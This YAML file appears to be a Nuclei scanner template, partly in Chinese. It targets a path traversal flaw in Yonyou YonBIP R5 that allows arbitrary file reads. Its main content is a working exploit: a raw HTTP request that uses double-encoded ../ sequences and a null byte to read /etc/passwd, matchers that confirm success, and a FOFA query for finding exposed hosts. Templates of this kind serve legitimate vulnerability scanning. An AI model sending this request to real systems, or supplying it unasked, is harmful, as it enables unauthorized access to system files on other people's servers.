http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'root:'
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: yongyouBIP-R5-yonbiplogin-File-reading
info:
    author: Superhero
    description: |-
        fofa: title="数字化工作台" || title="YonBIP"
        由于YonBIP R5旗舰版使用的Lua脚本(Nginx)不安全设计，存在路径穿越漏洞。未经身份验证的远程攻击者可以利用该漏洞实现任意文件读取，从而导致信息泄露。使系统处于极不安全的状态。
    name: 用友YonBIP R5旗舰版 yonbiplogin 任意文件读取
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489367&idx=1&sn=663d7d7ade66b040b24ea77019852546&chksm=c267a264f5102b729dc8269c7799351c334585f1a0686f55914d2c71a14aaa54cd9cafc0d16b&token=279945389&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - nginx
        - LUA
        - lua
        - 用友YonBIP
